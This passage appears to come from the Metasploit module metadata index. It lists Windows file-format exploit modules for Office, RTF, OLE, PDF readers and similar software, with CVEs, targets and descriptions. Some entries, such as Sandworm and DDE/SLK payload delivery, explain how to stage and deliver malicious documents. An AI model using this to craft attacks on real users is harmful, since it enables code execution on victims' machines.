"DJ Manila Ice, Vesh, CA"
],
"description": "This module exploits a stack-based buffer overflow in the handling of the\n 'pFragments' shape property within the Microsoft Word RTF parser. All versions\n of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\n MS10-087 bulletin are vulnerable.\n\n This module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n The Microsoft Word RTF parser was only used by default in versions of Microsoft\n Word itself prior to Office 2007. With the release of Office 2007, Microsoft\n began using the Word RTF parser, by default, to handle rich-text messages within\n Outlook as well. It was possible to configure Outlook 2003 and earlier to use\n the Microsoft Word engine too, but it was not a default setting.\n\n It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n Microsoft will confirm or deny this since Office 2000 has reached its support\n cycle end-of-life.",
"references": [
"CVE-2010-3333",
"OSVDB-69085",
"MSB-MS10-087",
"BID-44652",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Microsoft Office 2002 SP3 English on Windows XP SP3 English",
"Microsoft Office 2003 SP3 English on Windows XP SP3 English",
"Microsoft Office 2007 SP0 English on Windows XP SP3 English",
"Microsoft Office 2007 SP0 English on Windows Vista SP0 English",
"Microsoft Office 2007 SP0 English on Windows 7 SP0 English",
"Crash Target for Debugging"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms10_087_rtf_pfragments_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms11_006_createsizeddibsection": {
"name": "MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms11_006_createsizeddibsection",
"rank": 500,
"disclosure_date": "2010-12-15",
"type": "exploit",
"author": [
"Moti & Xu Hao",
"Yaniv Miron aka Lament of ilhack",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in the handling of thumbnails\n within .MIC files and various Office documents. When processing a thumbnail bitmap\n containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This\n leads to arbitrary code execution.\n\n In order to trigger the vulnerable code, the folder containing the document must be\n viewed using the \"Thumbnails\" view.",
"references": [
"CVE-2010-3970",
"OSVDB-70263",
"MSB-MS11-006",
"BID-45662",
"URL-http://www.microsoft.com/technet/security/advisory/2490606.mspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 SP0/SP4 English",
"Windows XP SP3 English",
"Crash Target for Debugging"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms11_006_createsizeddibsection",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms11_021_xlb_bof": {
"name": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms11_021_xlb_bof",
"rank": 300,
"disclosure_date": "2011-08-09",
"type": "exploit",
"author": [
"Aniway",
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Excel of Microsoft Office 2007.\n By supplying a malformed .xlb file, an attacker can control the content (source)\n of a memcpy routine, and the number of bytes to copy, therefore causing a stack-\n based buffer overflow. This results in arbitrary code execution under the context of\n the user.",
"references": [
"CVE-2011-0105",
"OSVDB-71765",
"MSB-MS11-021",
"ZDI-11-121"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Excel 2007 on Windows XP",
"Microsoft Office Excel 2007 SP2 on Windows XP"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms11_021_xlb_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms12_005": {
"name": "MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",
"full_name": "exploit/windows/fileformat/ms12_005",
"rank": 600,
"disclosure_date": "2012-01-10",
"type": "exploit",
"author": [
"Yorick Koster",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft Office's ClickOnce\n feature. When handling a Macro document, the application fails to recognize\n certain file extensions as dangerous executables, which can be used to bypass\n the warning message. This can allow attackers to trick victims into opening the\n malicious document, which will load up either a python or ruby payload, and\n finally, download and execute an executable.",
"references": [
"CVE-2012-0013",
"OSVDB-78207",
"MSB-MS12-005",
"BID-51284",
"URL-http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146",
"URL-http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office Word 2007/2010 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms12_005.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms12_005",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms12_027_mscomctl_bof": {
"name": "MS12-027 MSCOMCTL ActiveX Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms12_027_mscomctl_bof",
"rank": 200,
"disclosure_date": "2012-04-10",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\n RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\n in the wild on April 2012.\n\n This module targets Office 2007 and Office 2010. The DEP/ASLR bypass on Office\n 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses\n \"msgr3en.dll\", which is loaded after Office has started, so the malicious file must\n be loaded through \"File / Open\" to achieve exploitation.",
"references": [
"CVE-2012-0158",
"OSVDB-81125",
"BID-52911",
"MSB-MS12-027",
"URL-http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English",
"Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms12_027_mscomctl_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms13_071_theme": {
"name": "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",
"full_name": "exploit/windows/fileformat/ms13_071_theme",
"rank": 600,
"disclosure_date": "2013-09-10",
"type": "exploit",
"author": [
"Eduardo Prado",
"juan vazquez <juan.vazquez@metasploit.com>",
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows\n 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]\n section. An arbitrary path can be used as screen saver, including a remote SMB resource,\n which allows for remote code execution when a malicious .theme file is opened, and the\n \"Screen Saver\" tab is viewed. The code execution is also triggered if the victim installs\n the malicious theme and stays away from the computer, when Windows tries to display the\n screensaver.",
"references": [
"CVE-2013-0810",
"OSVDB-97136",
"MSB-MS13-071",
"BID-62176",
"URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms13_071_theme",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms14_017_rtf": {
"name": "MS14-017 Microsoft Word RTF Object Confusion",
"full_name": "exploit/windows/fileformat/ms14_017_rtf",
"rank": 300,
"disclosure_date": "2014-04-01",
"type": "exploit",
"author": [
"Haifei Li",
"Spencer McIntyre",
"unknown"
],
"description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a listoverridecount field can be modified\n to treat one structure as another.\n\n This bug was originally seen being exploited in the wild starting\n in April 2014. This module was created by reversing a public\n malware sample.",
"references": [
"CVE-2014-1761",
"MSB-MS14-017",
"URL-http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers",
"URL-https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office 2010 SP2 English on Windows 7 SP1 English"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/windows/fileformat/ms14_017_rtf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms14_017_rtf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
],
"SideEffects": [
"screen-effects"
]
}
},
"exploit_windows/fileformat/ms14_060_sandworm": {
"name": "MS14-060 Microsoft Windows OLE Package Manager Code Execution",
"full_name": "exploit/windows/fileformat/ms14_060_sandworm",
"rank": 600,
"disclosure_date": "2014-10-14",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly known as \"Sandworm\". Platforms such as Windows\n Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be\n vulnerable. However, based on our testing, the most reliable setup is on Windows platforms\n running Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such\n as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to\n a failure in the CPackage::CreateTempFileName function.\n\n This module will generate three files: an INF, a GIF, and a PPSX file. You are required to\n set up an SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an\n older version of Windows (such as XP) work best for this because they require little\n configuration to get going. The PPSX file is what you should send to your target.\n\n In detail, the vulnerability has to do with how the Object Packager 2 component\n (packager.dll) handles an INF file that contains malicious registry changes, which may be\n leveraged for code execution. First of all, Packager does not load the INF file directly.\n As an attacker, you can trick it into loading your INF anyway by embedding the file path as\n a remote share in an OLE object. The packager will then treat it as a type of media file,\n and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will\n download it with a CopyFileW call, save it in a temp folder, and pass that information for\n later. The exploit will do this loading process twice: first for a fake gif file that's\n actually the payload, and the second for the INF file.\n\n The packager will also look at each OLE object's XML Presentation Command, specifically the\n type and cmd property. In the exploit, \"verb\" media command type is used, and this triggers\n the packager!CPackage::DoVerb function. Also, \"-3\" is used as the fake gif file's cmd\n property, and \"3\" is used for the INF. When the cmd is \"-3\", DoVerb will bail. But when \"3\"\n is used (again, for the INF file), it will cause the packager to try to find an appropriate\n handler for it, which will end up with C:\\Windows\\System32\\infDefaultInstall.exe, and that\n will install/run the malicious INF file, and finally give us arbitrary code execution.",
"references": [
"CVE-2014-4114",
"OSVDB-113140",
"MSB-MS14-060",
"BID-70419",
"URL-http://www.isightpartners.com/2014/10/cve-2014-4114/",
"URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1 / Office 2010 SP2 / Office 2013"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms14_060_sandworm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms14_060_sandworm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms14_064_packager_python": {
"name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",
"full_name": "exploit/windows/fileformat/ms14_064_packager_python",
"rank": 600,
"disclosure_date": "2014-11-12",
"type": "exploit",
"author": [
"Haifei Li",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability\n publicly known as \"Sandworm\", on systems with Python for Windows installed. Windows Vista\n SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.\n However, based on our testing, the most reliable setup is on Windows platforms running\n Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as\n those using Office 2010 SP1 may be less stable, and may end up with a crash due to a\n failure in the CPackage::CreateTempFileName function.",
"references": [
"CVE-2014-6352",
"MSB-MS14-064",
"BID-70690",
"URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm"
],
"platform": "Python",
"arch": "python",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms14_064_packager_python.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms14_064_packager_python",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms14_064_packager_run_as_admin": {
"name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
"full_name": "exploit/windows/fileformat/ms14_064_packager_run_as_admin",
"rank": 600,
"disclosure_date": "2014-10-21",
"type": "exploit",
"author": [
"Haifei Li",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly exploited in the wild as an MS14-060 patch bypass.\n That Microsoft update tried to fix the vulnerability publicly known as \"Sandworm\". Platforms\n such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known\n to be vulnerable. However, based on our testing, the most reliable setup is on Windows\n platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other\n setups such as using Office 2010 SP1 might be less stable, and may end up with a\n crash due to a failure in the CPackage::CreateTempFileName function.",
"references": [
"CVE-2014-6352",
"MSB-MS14-064",
"BID-70690",
"URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 7 SP1 / Office 2010 SP2 / Office 2013"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms14_064_packager_run_as_admin",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms15_020_shortcut_icon_dllloader": {
"name": "Microsoft Windows Shell LNK Code Execution",
"full_name": "exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader",
"rank": 600,
"disclosure_date": "2015-03-10",
"type": "exploit",
"author": [
"Michael Heerklotz",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This module creates the required files to exploit the vulnerability. They must be\n uploaded to a UNC path accessible by the target. This module has been tested successfully\n on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32-bit) with MS14-027\n installed.",
"references": [
"CVE-2015-0096",
"MSB-MS15-020",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so",
"URL-https://github.com/rapid7/metasploit-framework/pull/4911"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms15_020_shortcut_icon_dllloader",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms15_100_mcl_exe": {
"name": "MS15-100 Microsoft Windows Media Center MCL Vulnerability",
"full_name": "exploit/windows/fileformat/ms15_100_mcl_exe",
"rank": 600,
"disclosure_date": "2015-09-08",
"type": "exploit",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Windows Media Center. By supplying\n a UNC path in the *.mcl file, a remote file will be automatically downloaded,\n which can result in arbitrary code execution.",
"references": [
"CVE-2015-2509",
"MSB-MS15-100"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms15_100_mcl_exe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ms_visual_basic_vbp": {
"name": "Microsoft Visual Basic VBP Buffer Overflow",
"full_name": "exploit/windows/fileformat/ms_visual_basic_vbp",
"rank": 400,
"disclosure_date": "2007-09-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack overflow in Microsoft Visual\n Basic 6.0. When a specially crafted vbp file containing a long\n reference line is opened, an attacker may be able to execute arbitrary\n code.",
"references": [
"CVE-2007-4776",
"OSVDB-36936",
"BID-25629"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ms_visual_basic_vbp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mswin_tiff_overflow": {
"name": "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow",
"full_name": "exploit/windows/fileformat/mswin_tiff_overflow",
"rank": 200,
"disclosure_date": "2013-11-05",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft's Tagged Image File Format.\n It was originally discovered in the wild, targeting Windows XP and Windows Server 2003\n users running Microsoft Office, specifically in the Middle East and South Asia region.\n\n The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a\n drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,\n and stored in the EAX register. The 32-bit register will run out of storage space to\n represent the large value, which ends up being 0, but it still gets pushed as a\n dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a\n chunk anyway with size 0, and the address of this chunk is used as the destination buffer\n of a memcpy function, where the source buffer is the EXIF data (an extended image format\n supported by TIFF), and is also user-controlled. A function pointer in the chunk returned\n by HeapAlloc will end up being overwritten by the memcpy function, and then later used\n in OGL!GdipCreatePath. By successfully controlling this function pointer, and the\n memory layout using ActiveX, it is possible to gain arbitrary code execution under the\n context of the user.",
"references": [
"CVE-2013-3906",
"MSB-MS13-096",
"OSVDB-99376",
"URL-http://technet.microsoft.com/en-us/security/advisory/2896666",
"URL-http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 with Office Standard 2010"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mswin_tiff_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/msworks_wkspictureinterface": {
"name": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution",
"full_name": "exploit/windows/fileformat/msworks_wkspictureinterface",
"rank": 100,
"disclosure_date": "2008-11-28",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n to execute arbitrary code on a system. By passing a negative integer to the\n WksPictureInterface method, an attacker could execute arbitrary code on the system\n with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\n This control is not marked safe for scripting, please choose your attack vector carefully.",
"references": [
"CVE-2008-1898",
"OSVDB-44458"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2-SP3 IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/msworks_wkspictureinterface",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/mymp3player_m3u": {
"name": "Steinberg MyMP3Player 3.0 Buffer Overflow",
"full_name": "exploit/windows/fileformat/mymp3player_m3u",
"rank": 400,
"disclosure_date": "2010-03-18",
"type": "exploit",
"author": [
"n3w7u",
"m_101"
],
"description": "This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When\n the application is used to open a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"OSVDB-64580",
"EDB-11791"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal",
"Windows Universal (SEH)",
"Windows XP SP3 French"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/mymp3player_m3u",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/netop": {
"name": "NetOp Remote Control Client 9.5 Buffer Overflow",
"full_name": "exploit/windows/fileformat/netop",
"rank": 300,
"disclosure_date": "2011-04-28",
"type": "exploit",
"author": [
"Ruben Alejandro \"chap0\""
],
"description": "This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.\n Opening a .dws file containing a specially crafted string longer than 520\n characters allows an attacker to execute arbitrary code.",
"references": [
"OSVDB-72291",
"EDB-17223"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/netop.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/netop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/nitro_reader_jsapi": {
"name": "Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution",
"full_name": "exploit/windows/fileformat/nitro_reader_jsapi",
"rank": 600,
"disclosure_date": "2017-07-24",
"type": "exploit",
"author": [
"mr_me <steven@srcincite.io>",
"bcoles <bcoles@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro\n PDF Reader version 11. The saveAs() Javascript API function allows for writing\n arbitrary files to the file system. Additionally, the launchURL() function allows\n an attacker to execute local files on the file system and bypass the security dialog.\n\n Note: This is 100% reliable.",
"references": [
"CVE-2017-7442",
"URL-http://srcincite.io/advisories/src-2017-0005/",
"URL-https://blogs.securiteam.com/index.php/archives/3251"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/nitro_reader_jsapi",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/nuance_pdf_launch_overflow": {
"name": "Nuance PDF Reader v6.0 Launch Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/nuance_pdf_launch_overflow",
"rank": 500,
"disclosure_date": "2010-10-08",
"type": "exploit",
"author": [
"corelanc0d3r <peter.ve@corelan.be>",
"rick2600"
],
"description": "This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is\n triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record.\n This exploit does not use javascript.",
"references": [
"OSVDB-68514",
"URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Nuance PDF Reader v6.x (XP SP3)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/nuance_pdf_launch_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_dde_delivery": {
"name": "Microsoft Office DDE Payload Delivery",
"full_name": "exploit/windows/fileformat/office_dde_delivery",
"rank": 0,
"disclosure_date": "2017-10-09",
"type": "exploit",
"author": [
"mumbai"
],
"description": "This module generates a DDE command to place within\n a Word document that, when executed, will retrieve an HTA payload\n via HTTP from a web server.",
"references": [
"URL-https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563",
"URL-https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office"
],
"mod_time": "2017-12-07 14:44:36 +0000",
"path": "/modules/exploits/windows/fileformat/office_dde_delivery.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_dde_delivery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_excel_slk": {
"name": "Microsoft Excel .SLK Payload Delivery",
"full_name": "exploit/windows/fileformat/office_excel_slk",
"rank": 0,
"disclosure_date": "2018-10-07",
"type": "exploit",
"author": [
"Carter Brainerd",
"Stan Hegt",
"Pieter Ceelen"
],
"description": "This module generates a download and execute Powershell\n command to be placed in an .SLK Excel spreadsheet.\n When executed, it will retrieve a payload via HTTP\n from a web server. When the file is opened, the\n user will be prompted to \"Enable Content.\" Once\n this is pressed, the payload will execute.",
"references": [
"URL-https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files",
"URL-https://www.twitter.com/StanHacked/status/1049047727403937795",
"URL-http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Excel"
],
"mod_time": "2019-02-11 12:37:17 +0000",
"path": "/modules/exploits/windows/fileformat/office_excel_slk.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_excel_slk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_ms17_11882": {
"name": "Microsoft Office CVE-2017-11882",
"full_name": "exploit/windows/fileformat/office_ms17_11882",
"rank": 0,
"disclosure_date": "2017-11-15",
"type": "exploit",
"author": [
"mumbai",
"embedi"
],
"description": "This module exploits a flaw in the Equation Editor that\n allows an attacker to execute arbitrary code via RTF files without\n user interaction beyond opening the file. The vulnerability is caused by the Equation Editor\n failing to properly handle OLE objects in memory.",
"references": [
"CVE-2017-11882",
"URL-https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about",
"URL-https://github.com/embedi/CVE-2017-11882"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Microsoft Office"
],
"mod_time": "2018-08-28 13:44:01 +0000",
"path": "/modules/exploits/windows/fileformat/office_ms17_11882.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/office_ms17_11882",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/office_ole_multiple_dll_hijack": {
"name": "Office OLE Multiple DLL Side Loading Vulnerabilities",
"full_name": "exploit/windows/fileformat/office_ole_multiple_dll_hijack",
"rank": 300,
"disclosure_date": "2015-12-08",
"type": "exploit",
"author": [
"Yorick Koster"
],
